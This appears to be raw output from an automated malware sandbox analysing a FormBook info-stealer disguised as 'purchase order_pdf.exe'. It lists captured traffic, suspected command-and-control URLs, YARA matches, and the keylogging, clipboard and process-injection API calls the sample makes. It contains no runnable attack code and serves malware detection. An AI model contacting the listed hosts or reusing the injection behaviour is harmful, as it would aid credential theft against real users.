63 ab 7d 38 88 96 23 ec 0c 1e b0 e4 1b f4 db 84 56 10 79 8e 1b 2d 3c fb f2 38 3a b7 17 ec b3 06 10 fd 36 e2 21 7b 3a 05 f9 f7 d9 b7 c1 1f ae e7 d9 8d 6e dd 62 7b 6f fd 53 3f 38 f7 07 ec 1b d7 5f 5e b0 8b c3 de b0 d7 d9 67 4f 17 0b 8f bf e3 a3 bf bb 71 a3 db 3e ac 37 d9 de df Data Ascii: 4b71}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 05:22:58 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jul 2024 05:23:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: isoburn.exe, 00000006.00000002.4112853127.0000000006DDE000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004C6E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://411divorce.com/6rlx/?MdEl=Q2ZAF
Source: firefox.exe, 00000009.00000002.2352034593.000002F3EFD97000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: isoburn.exe, 00000006.00000002.4112853127.0000000006DDE000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004C6E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wordpress.org/extend/plugins/nginx-helper/faq/
Source: PIrlNRZFMoz.exe, 00000008.00000002.4114217360.00000000058AD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.sgbet777.org
Source: PIrlNRZFMoz.exe, 00000008.00000002.4114217360.00000000058AD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.sgbet777.org/aiec/
Source: isoburn.exe, 00000006.00000002.4114710571.0000000007EC0000.00000004.00000800.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://301mei.xyz:7788/?u=
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: isoburn.exe, 00000006.00000002.4114710571.0000000007EC0000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.4112853127.00000000062E0000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004170000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: isoburn.exe, 00000006.00000002.4112853127.00000000062E0000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004170000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033L
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: isoburn.exe, 00000006.00000002.4111352732.00000000032A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: isoburn.exe, 00000006.00000003.2241107111.000000000814C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: isoburn.exe, 00000006.00000002.4112853127.0000000006604000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004494000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P
Source: isoburn.exe, 00000006.00000002.4112853127.00000000062E0000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004170000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api.js?hl=en

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008E425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_008E425A

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008E4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_008E4458

Source: C:\Users\user\Desktop\purchase order_pdf.exe

0_2_008E425A

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008D0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_008D0219

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008FCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_008FCDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00873B4C
Source: purchase order_pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: purchase order_pdf.exe, 00000000.00000000.1633636100.0000000000925000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_74105a62-8
Source: purchase order_pdf.exe, 00000000.00000000.1633636100.0000000000925000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_23ca140f-5
Source: purchase order_pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5b798e89-0
Source: purchase order_pdf.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c0ef616f-d

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: purchase order_pdf.exe
Source: initial sample	Static PE information: Filename: purchase order_pdf.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042BBA3 NtClose,	1_2_0042BBA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772B60 NtClose,LdrInitializeThunk,	1_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,	1_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03774340 NtSetContextThread,	1_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03774650 NtSuspendThread,	1_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BF0 NtAllocateVirtualMemory,	1_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BE0 NtQueryValueKey,	1_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772BA0 NtEnumerateValueKey,	1_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772B80 NtQueryInformationFile,	1_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AF0 NtWriteFile,	1_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AD0 NtReadFile,	1_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772AB0 NtWaitForSingleObject,	1_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F60 NtCreateProcessEx,	1_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F30 NtCreateSection,	1_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FE0 NtCreateFile,	1_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FB0 NtResumeThread,	1_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772FA0 NtQuerySection,	1_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772F90 NtProtectVirtualMemory,	1_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772E30 NtWriteVirtualMemory,	1_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772EE0 NtQueueApcThread,	1_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772EA0 NtAdjustPrivilegesToken,	1_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772E80 NtReadVirtualMemory,	1_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D30 NtUnmapViewOfSection,	1_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D10 NtMapViewOfSection,	1_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772D00 NtSetInformationFile,	1_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DD0 NtDelayExecution,	1_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772DB0 NtEnumerateKey,	1_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C70 NtFreeVirtualMemory,	1_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C60 NtCreateKey,	1_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772C00 NtQueryInformationProcess,	1_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CF0 NtOpenProcess,	1_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CC0 NtQueryVirtualMemory,	1_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772CA0 NtQueryInformationToken,	1_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773010 NtOpenDirectoryObject,	1_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773090 NtSetValueKey,	1_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037739B0 NtGetContextThread,	1_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773D70 NtOpenThread,	1_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03773D10 NtOpenProcessToken,	1_2_03773D10
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD4650 NtSuspendThread,LdrInitializeThunk,	6_2_04FD4650
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD4340 NtSetContextThread,LdrInitializeThunk,	6_2_04FD4340
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04FD2CA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04FD2C70
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2C60 NtCreateKey,LdrInitializeThunk,	6_2_04FD2C60
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04FD2DF0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04FD2DD0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04FD2D30
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04FD2D10
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_04FD2EE0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04FD2E80
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2FE0 NtCreateFile,LdrInitializeThunk,	6_2_04FD2FE0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2FB0 NtResumeThread,LdrInitializeThunk,	6_2_04FD2FB0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2F30 NtCreateSection,LdrInitializeThunk,	6_2_04FD2F30
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2AF0 NtWriteFile,LdrInitializeThunk,	6_2_04FD2AF0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2AD0 NtReadFile,LdrInitializeThunk,	6_2_04FD2AD0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04FD2BF0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04FD2BE0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04FD2BA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2B60 NtClose,LdrInitializeThunk,	6_2_04FD2B60
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD35C0 NtCreateMutant,LdrInitializeThunk,	6_2_04FD35C0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD39B0 NtGetContextThread,LdrInitializeThunk,	6_2_04FD39B0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2CF0 NtOpenProcess,	6_2_04FD2CF0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2CC0 NtQueryVirtualMemory,	6_2_04FD2CC0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2C00 NtQueryInformationProcess,	6_2_04FD2C00
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2DB0 NtEnumerateKey,	6_2_04FD2DB0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2D00 NtSetInformationFile,	6_2_04FD2D00
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2EA0 NtAdjustPrivilegesToken,	6_2_04FD2EA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2E30 NtWriteVirtualMemory,	6_2_04FD2E30
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2FA0 NtQuerySection,	6_2_04FD2FA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2F90 NtProtectVirtualMemory,	6_2_04FD2F90
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2F60 NtCreateProcessEx,	6_2_04FD2F60
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2AB0 NtWaitForSingleObject,	6_2_04FD2AB0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD2B80 NtQueryInformationFile,	6_2_04FD2B80
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD3090 NtSetValueKey,	6_2_04FD3090
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD3010 NtOpenDirectoryObject,	6_2_04FD3010
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD3D70 NtOpenThread,	6_2_04FD3D70
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD3D10 NtOpenProcessToken,	6_2_04FD3D10
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D68250 NtAllocateVirtualMemory,	6_2_02D68250
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D680F0 NtClose,	6_2_02D680F0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D68050 NtDeleteFile,	6_2_02D68050
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D67E00 NtCreateFile,	6_2_02D67E00
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D67F60 NtReadFile,	6_2_02D67F60
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBD3DC NtSetContextThread,	6_2_04DBD3DC

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008D40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_008D40B1

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008C8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_008C8858

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008D545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_008D545F

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0087E800	0_2_0087E800
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089DBB5	0_2_0089DBB5
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008F804A	0_2_008F804A
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0087E060	0_2_0087E060
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00884140	0_2_00884140
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00892405	0_2_00892405
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A6522	0_2_008A6522
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008F0665	0_2_008F0665
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A267E	0_2_008A267E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089283A	0_2_0089283A
